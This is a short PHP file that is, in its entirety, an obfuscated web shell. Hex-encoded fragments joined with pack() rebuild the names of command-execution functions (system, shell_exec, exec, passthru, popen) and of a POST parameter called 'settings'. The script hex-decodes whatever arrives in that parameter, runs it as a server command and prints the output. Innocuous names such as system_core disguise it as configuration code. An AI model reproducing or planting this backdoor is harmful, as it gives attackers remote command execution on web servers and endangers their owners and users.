<?php


$key1 = '79';
$key2 = '6d';
$key3 = '68';
$key4 = '78';
$key5 = '63';
$key6 = '65';
$key7 = '70';
$key8 = '73';
$key9 = '72';
$key10 = '6e';
$key11 = '74';
$key12 = '61';
$key13 = '5f';
$key14 = '6f';
$key15 = '6c';
$system_core1 = pack("H*", '73' . $key1 . '73' . '74' . '65' . $key2);
$system_core2 = pack("H*", '73' . $key3 . '65' . '6c' . '6c' . '5f' . '65' . $key4 . '65' . $key5);
$system_core3 = pack("H*", $key6 . '78' . $key6 . '63');
$system_core4 = pack("H*", $key7 . '61' . '73' . $key8 . '74' . $key3 . $key9 . '75');
$system_core5 = pack("H*", '70' . '6f' . $key7 . '65' . $key10);
$system_core6 = pack("H*", '73' . $key11 . $key9 . '65' . $key12 . '6d' . $key13 . '67' . $key6 . $key11 . $key13 . $key5 . $key14 . '6e' . $key11 . $key6 . $key10 . $key11 . $key8);
$system_core7 = pack("H*", '70' . $key5 . $key15 . '6f' . $key8 . $key6);
$settings = pack("H*", '73' . $key6 . $key11 . '74' . '69' . $key10 . '67' . $key8);
if (isset($_POST[$settings])) {
    $settings = pack("H*", $_POST[$settings]);
    if (function_exists($system_core1)) {
        $system_core1($settings);
    } elseif (function_exists($system_core2)) {
        print $system_core2($settings);
    } elseif (function_exists($system_core3)) {
        $system_core3($settings, $fac_mrk);
        print join("\n", $fac_mrk);
    } elseif (function_exists($system_core4)) {
        $system_core4($settings);
    } elseif (function_exists($system_core5) && function_exists($system_core6) && function_exists($system_core7)) {
        $entity_property_set = $system_core5($settings, 'r');
        if ($entity_property_set) {
            $dchunk_ent = $system_core6($entity_property_set);
            $system_core7($entity_property_set);
            print $dchunk_ent;
        }
    }
    exit;
}
